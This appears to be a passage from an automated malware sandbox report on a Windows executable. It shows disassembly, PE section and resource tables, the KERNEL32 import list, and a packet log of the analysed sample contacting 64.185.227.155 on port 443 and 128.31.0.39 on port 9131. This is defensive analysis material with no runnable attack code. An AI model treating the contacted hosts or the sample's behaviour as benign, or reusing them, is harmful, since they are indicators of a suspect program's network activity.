                      mov dword ptr [004137B0h], edx
                      mov dword ptr [004137ACh], ebx
                      mov dword ptr [004137A8h], esi
                      mov dword ptr [004137A4h], edi
                      mov word ptr [004137D0h], ss
                      mov word ptr [004137C4h], cs
                      mov word ptr [004137A0h], ds
                      mov word ptr [0041379Ch], es
                      mov word ptr [00413798h], fs
                      mov word ptr [00413794h], gs
                      pushfd
                      pop dword ptr [004137C8h]
                      mov eax, dword ptr [ebp+00h]
                      mov dword ptr [004137BCh], eax
                      mov eax, dword ptr [ebp+04h]
                      mov dword ptr [004137C0h], eax
                      lea eax, dword ptr [ebp+08h]
                      mov dword ptr [004137CCh], eax
                      mov eax, dword ptr [ebp-00000320h]
                      mov dword ptr [00413708h], 00010001h
                      mov eax, dword ptr [004137C0h]
                      mov dword ptr [004136BCh], eax
                      mov dword ptr [004136B0h], C0000409h
                      mov dword ptr [004136B4h], 00000001h
                      mov eax, dword ptr [00411004h]
                      mov dword ptr [ebp-00000328h], eax
                      mov eax, dword ptr [00411008h]
                      mov dword ptr [ebp-00000324h], eax
                      call dword ptr [00000050h]
                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0xfb040x28.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x44a0000x9928.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x11400x1c.text
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x10000x100.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000xf0ca0xf200False0.7380391270661157data7.337350654748941IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .data0x110000x438d7c0x3a00unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0x44a0000x99280x9a00False0.5094612418831169data4.909716761836486IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      NameRVASizeTypeLanguageCountry
                      RT_CURSOR0x450f600x330Device independent bitmap graphic, 48 x 96 x 1, image size 0EnglishUnited States
                      RT_CURSOR0x4512900x130Device independent bitmap graphic, 32 x 64 x 1, image size 0EnglishUnited States
                      RT_CURSOR0x4513c00xb0Device independent bitmap graphic, 16 x 32 x 1, image size 0EnglishUnited States
                      RT_CURSOR0x4514a00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States
                      RT_CURSOR0x4523480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States
                      RT_CURSOR0x452c180x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States
                      RT_ICON0x44a5a00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States
                      RT_ICON0x44b4480x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States
                      RT_ICON0x44bcf00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States
                      RT_ICON0x44c3b80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States
                      RT_ICON0x44c9200x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States
                      RT_ICON0x44eec80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States
                      RT_ICON0x44ff700x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States
                      RT_ICON0x4508f80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States
                      RT_DIALOG0x450e900x64dataEnglishUnited States
                      RT_DIALOG0x450ef80x64dataEnglishUnited States
                      RT_STRING0x452f180x478dataEnglishUnited States
                      RT_STRING0x4533900x288dataEnglishUnited States
                      RT_STRING0x4536180x30cdataEnglishUnited States
                      RT_ACCELERATOR0x450dd80xb8dataEnglishUnited States
                      RT_GROUP_CURSOR0x4514700x30dataEnglishUnited States
                      RT_GROUP_CURSOR0x452bf00x22dataEnglishUnited States
                      RT_GROUP_CURSOR0x452d500x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                      RT_GROUP_ICON0x450d600x76dataEnglishUnited States
                      RT_VERSION0x452d680x1acdataEnglishUnited States
                      DLLImport
                      KERNEL32.dllWriteFile, GetDriveTypeA, Sleep, lstrlenW, LCMapStringA, GetTickCount, GetProcAddress, GetPrivateProfileSectionA, VirtualProtect, GetConsoleCursorInfo, GetCurrentProcessId, GetModuleHandleW, InterlockedIncrement, GetProcessIoCounters, GetLocaleInfoA, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, ExitProcess, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, DeleteCriticalSection, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, GetLastError, InterlockedDecrement, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LeaveCriticalSection, EnterCriticalSection, LoadLibraryA, InitializeCriticalSectionAndSpinCount, HeapAlloc, VirtualAlloc, HeapReAlloc, RtlUnwind, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, HeapSize
                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States
                      TimestampSource PortDest PortSource IPDest IP
                      Feb 9, 2023 00:59:56.638425112 CET49699443192.168.2.564.185.227.155
                      Feb 9, 2023 00:59:56.638498068 CET4434969964.185.227.155192.168.2.5
                      Feb 9, 2023 00:59:56.638593912 CET49699443192.168.2.564.185.227.155
                      Feb 9, 2023 00:59:56.639707088 CET49699443192.168.2.564.185.227.155
                      Feb 9, 2023 00:59:56.639751911 CET4434969964.185.227.155192.168.2.5
                      Feb 9, 2023 00:59:57.123645067 CET4434969964.185.227.155192.168.2.5
                      Feb 9, 2023 00:59:57.123771906 CET49699443192.168.2.564.185.227.155
                      Feb 9, 2023 00:59:57.128288031 CET49699443192.168.2.564.185.227.155
                      Feb 9, 2023 00:59:57.128319025 CET4434969964.185.227.155192.168.2.5
                      Feb 9, 2023 00:59:57.128932953 CET4434969964.185.227.155192.168.2.5
                      Feb 9, 2023 00:59:57.140402079 CET49699443192.168.2.564.185.227.155
                      Feb 9, 2023 00:59:57.140454054 CET4434969964.185.227.155192.168.2.5
                      Feb 9, 2023 00:59:57.448452950 CET4434969964.185.227.155192.168.2.5
                      Feb 9, 2023 00:59:57.448565960 CET4434969964.185.227.155192.168.2.5
                      Feb 9, 2023 00:59:57.448642015 CET49699443192.168.2.564.185.227.155
                      Feb 9, 2023 00:59:57.462213993 CET49699443192.168.2.564.185.227.155
                      Feb 9, 2023 00:59:57.462255001 CET4434969964.185.227.155192.168.2.5
                      Feb 9, 2023 00:59:57.477998972 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.578886032 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.579145908 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.579632044 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.680644035 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.680700064 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.680738926 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.680764914 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.680790901 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.680800915 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.680833101 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.680844069 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.680859089 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.680881977 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.680907965 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.680907965 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.680934906 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.680947065 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.680959940 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.680998087 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.782321930 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.782409906 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.782442093 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.782471895 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.782480955 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.782500982 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.782517910 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.782550097 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.782582998 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.782610893 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.782632113 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.782670975 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.782674074 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.782717943 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.782746077 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.782759905 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.782773972 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.782802105 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.782821894 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.782859087 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.782887936 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.782903910 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.782916069 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.782943010 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.782962084 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.782972097 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.783001900 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.783010960 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.783032894 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.783071041 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.884882927 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.884932041 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.884957075 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.884979963 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885001898 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885025024 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885046005 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885078907 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.885078907 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.885135889 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885176897 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885185003 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.885226965 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885257006 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885276079 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.885384083 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885426044 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885452032 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885457039 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.885473013 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885493040 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885509014 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.885524035 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885535955 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.885564089 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885585070 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885607958 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.885610104 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885632038 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885653019 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885652065 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.885678053 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885693073 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.885710955 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885734081 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885756016 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.885792971 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885819912 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885864019 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885869980 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.885898113 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885911942 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.885922909 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885945082 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885967016 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.885978937 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.885991096 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.886012077 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.886029005 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.886049986 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.886070013 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.886137962 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.886168957 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.886184931 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.886193037 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.886234045 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.886253119 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.886277914 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.886320114 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.987468958 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.987519979 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.987560034 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.987586975 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.987610102 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.987632990 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.987672091 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.987695932 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.987751007 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.987771034 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.987781048 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.987842083 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.987900019 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.987907887 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.987961054 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.987993956 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.988023996 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.988075018 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.988106966 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.988141060 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.988162994 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.988234043 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.988239050 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.988279104 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.988317966 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.988347054 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.988394976 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.988425970 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.988451958 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.988467932 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.988503933 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.988533020 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.988589048 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.988637924 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.988655090 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.988698959 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.988730907 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.988763094 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.988765001 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.988820076 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.988826036 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.988883018 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.988913059 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.988940001 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.988970995 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.989002943 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.989033937 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.989068031 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.989115953 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.989128113 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.989198923 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.989243984 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.989263058 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.989289999 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.989322901 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.989351988 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.989368916 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.989396095 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.989419937 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.989439964 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.989476919 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.989511013 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.989516020 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.989552975 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.989581108 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.989595890 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.989634037 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.989660025 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.989677906 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.989715099 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.989751101 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:57.989754915 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:57.989820004 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.090516090 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.090564966 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.090591908 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.090616941 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.090667009 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.090723038 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.090754986 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.090774059 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.090805054 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.090833902 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.090837002 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.090871096 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.090883017 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.090903997 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.090939045 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.090954065 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.090971947 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.091005087 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.091016054 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.091038942 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.091094971 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.091118097 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.091166019 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.091228962 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.091455936 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.091571093 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.091640949 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.091665983 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.091747046 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.091785908 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.091809988 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.091861963 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.091893911 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.091912031 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.091926098 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.091969013 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.091972113 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.092021942 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.092051029 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.092072964 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.092088938 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.092139959 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.092158079 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.092200041 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.092232943 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.092252016 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.092264891 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.092297077 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.092320919 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.092330933 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.092361927 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.092376947 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.092396021 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.092432976 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.092438936 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.092464924 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.092495918 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.092519999 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.092529058 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.092572927 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.092586040 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.092600107 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.092628956 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.092643976 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.092657089 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.092684984 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.092705965 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.092713118 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.092740059 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.092762947 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.092767954 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.092793941 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.092818975 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.092823029 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.092881918 CET497009131192.168.2.5128.31.0.39
                      Feb 9, 2023 00:59:58.191749096 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.191796064 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.191827059 CET913149700128.31.0.39192.168.2.5
                      Feb 9, 2023 00:59:58.191858053 CET913149700128.31.0.39192.168.2.5
